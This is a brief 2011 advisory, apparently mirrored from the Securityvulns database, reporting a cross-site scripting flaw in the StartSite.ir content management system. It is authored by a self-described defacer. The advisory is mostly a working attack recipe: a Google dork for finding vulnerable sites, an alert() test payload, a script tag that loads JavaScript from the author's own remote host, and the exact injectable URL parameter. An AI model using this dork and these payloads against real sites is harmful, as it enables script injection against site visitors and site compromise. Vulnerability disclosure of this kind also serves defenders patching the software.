StartSite.ir Cross-site Scripting Vulnerability

2011-04-06T00:00:00
ID SECURITYVULNS:DOC:26071
Type securityvulns
Reporter Securityvulns
Modified 2011-04-06T00:00:00

Description

------------In The Name Of God------------

StartSite.ir Cross-site Scripting Vulnerability

AUTHOR: md.r00t

Mail: md.r00t.defacer@gmail.com

Website: www.r00t.gigfa.com

Forum: http://ajaxtm.com/forum

Google D0rk:

"Powered by StartSite.ir"

xss EXPLOIT:

<script>alert(/0/)</script> <script src="http://md-r00t.persiangig.com/xpl/XSS1.JS"></script>

VULN IN HERE

/content.asp?Catid=247&ContentType=<script>alert(/0/)</script>

TNX:

Ajax Security Team,Aria-Security Team (Persian Security Network),hadihadi & black.shadowes(Virangar Security Team)